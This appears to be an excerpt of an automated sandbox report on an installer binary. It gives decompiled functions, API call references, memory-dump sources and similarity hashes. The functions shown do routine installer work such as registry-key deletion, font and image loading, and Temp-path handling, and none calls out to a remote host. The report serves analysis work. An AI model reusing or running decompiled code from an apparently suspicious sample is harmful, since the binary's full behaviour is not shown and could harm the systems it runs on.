                                          0x004022dd
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                          • GlobalFree.KERNEL32 ref: 0040288E
                                          • GlobalFree.KERNEL32 ref: 004028A1
                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                          • String ID:
                                          • API String ID: 2667972263-0
                                          • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                          • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                          • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                          • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}



















                                          0x00404afb
                                          0x00404b00
                                          0x00404b08
                                          0x00404b09
                                          0x00404b16
                                          0x00404b1e
                                          0x00404b1f
                                          0x00404b21
                                          0x00404b23
                                          0x00404b25
                                          0x00404b28
                                          0x00404b28
                                          0x00404b2f
                                          0x00404b35
                                          0x00404b35
                                          0x00404b3c
                                          0x00404b43
                                          0x00404b46
                                          0x00404b49
                                          0x00404b49
                                          0x00404b4d
                                          0x00404b5d
                                          0x00404b5f
                                          0x00404b62
                                          0x00404b0b
                                          0x00404b0b
                                          0x00404b12
                                          0x00404b12
                                          0x00404b6a
                                          0x00404b75
                                          0x00404b8b
                                          0x00404b9b
                                          0x00404bb7

                                          APIs
                                          • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                          • wsprintfA.USER32 ref: 00404B9B
                                          • SetDlgItemTextA.USER32 ref: 00404BAE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$PB
                                          • API String ID: 3540041739-838025833
                                          • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                          • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                          • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                          • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                          0x00402cdb
                                          0x00402ce4
                                          0x00402ced
                                          0x00402cf9
                                          0x00402d02
                                          0x00402d0c
                                          0x00402d31
                                          0x00402d37
                                          0x00402d3c
                                          0x00402d3d
                                          0x00402d6d
                                          0x00402d46
                                          0x00402d48
                                          0x00402d98
                                          0x00402d9b
                                          0x00000000
                                          0x00402da1
                                          0x00402d57
                                          0x00402d5c
                                          0x00402d5e
                                          0x00000000
                                          0x00000000
                                          0x00402d66
                                          0x00402d6b
                                          0x00402d6c
                                          0x00402d6c
                                          0x00402d79
                                          0x00402d81
                                          0x00402d88
                                          0x00000000
                                          0x00402db1
                                          0x00000000
                                          0x00402d90
                                          0x00402d1c
                                          0x00402d2f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402d2f
                                          0x00402db7

                                          APIs
                                          • RegEnumValueA.ADVAPI32 ref: 00402D24
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                          • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                          • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                          • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                          0x00401d65
                                          0x00401d69
                                          0x00401d7e
                                          0x00401d6b
                                          0x00401d6d
                                          0x00401d73
                                          0x00401d73
                                          0x00401d84
                                          0x00401d87
                                          0x00401d91
                                          0x00401d94
                                          0x00401d9c
                                          0x00401dad
                                          0x00401db0
                                          0x00401dbb
                                          0x00401db2
                                          0x00401db4
                                          0x00401db4
                                          0x00401dbf
                                          0x00401dcc
                                          0x00401df3
                                          0x00401e02
                                          0x00401e10
                                          0x00401e18
                                          0x00401e20
                                          0x00401e20
                                          0x00401e29
                                          0x00401e2f
                                          0x004029a5
                                          0x004029a5
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                          • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                          • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                          • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                          0x00401e35
                                          0x00401e40
                                          0x00401e42
                                          0x00401e4f
                                          0x00401e66
                                          0x00401e6b
                                          0x00401e78
                                          0x00401e7d
                                          0x00401e81
                                          0x00401e8c
                                          0x00401e93
                                          0x00401ea5
                                          0x00401eab
                                          0x00401eb0
                                          0x00401eba
                                          0x00402620
                                          0x00401569
                                          0x004029a5
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          • GetDC.USER32(?), ref: 00401E38
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                          • ReleaseDC.USER32 ref: 00401E6B
                                          • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID:
                                          • API String ID: 3808545654-0
                                          • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                          • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                          • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                          • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                          0x00401c2e
                                          0x00401c30
                                          0x00401c37
                                          0x00401c3a
                                          0x00401c3d
                                          0x00401c47
                                          0x00401c4b
                                          0x00401c4e
                                          0x00401c57
                                          0x00401c57
                                          0x00401c5a
                                          0x00401c5e
                                          0x00401c67
                                          0x00401c67
                                          0x00401c6a
                                          0x00401c6e
                                          0x00401c70
                                          0x00401cc5
                                          0x00401cc7
                                          0x00401cd0
                                          0x00401cd8
                                          0x00401cdb
                                          0x00401cdb
                                          0x00401ce4
                                          0x00000000
                                          0x00401c72
                                          0x00401c79
                                          0x00401c7b
                                          0x00401c7e
                                          0x00401c84
                                          0x00401c8b
                                          0x00401c8e
                                          0x00401cb6
                                          0x00401cea
                                          0x00401cea
                                          0x00401c90
                                          0x00401c9e
                                          0x00401ca6
                                          0x00401ca9
                                          0x00401ca9
                                          0x00401c8e
                                          0x00401ced
                                          0x00401cf0
                                          0x00401cf6
                                          0x004029a5
                                          0x004029a5
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                          • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                          • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                          • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                          0x00405bc1
                                          0x00405bd8
                                          0x00405be0
                                          0x00405be0
                                          0x00405be8

                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BCF
                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-3081826266
                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                          • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                          • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                          0x00405c62
                                          0x00405c69
                                          0x00405c6c
                                          0x00405c6e
                                          0x00405c72
                                          0x00405c87
                                          0x00405ca6
                                          0x00000000
                                          0x00405c8e
                                          0x00405c90
                                          0x00405c91
                                          0x00405c94
                                          0x00405c95
                                          0x00405c9d
                                          0x00000000
                                          0x00000000
                                          0x00405c9f
                                          0x00405ca2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ca2
                                          0x00000000
                                          0x00405c91
                                          0x00405c7f
                                          0x00000000
                                          0x00405c80

                                          APIs
                                          • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                          • CharNextA.USER32(00000000), ref: 00405C6C
                                          • CharNextA.USER32(00000000), ref: 00405C80
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nszCE87.tmp, xrefs: 00405C5A
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: C:\Users\user\AppData\Local\Temp\nszCE87.tmp
                                          • API String ID: 3213498283-2010284083
                                          • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                          • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                                          • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                          • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2b4
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2c4
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\jones\\AppData\\Local\\Temp\\nszCE87.tmp", 7);
			}






                                          0x00403949
                                          0x00403958
                                          0x0040395b
                                          0x0040395d
                                          0x0040395d
                                          0x00403964
                                          0x0040396c
                                          0x0040396f
                                          0x00403971
                                          0x00403971
                                          0x00403971
                                          0x00403978
                                          0x0040398a

                                          APIs
                                          • CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
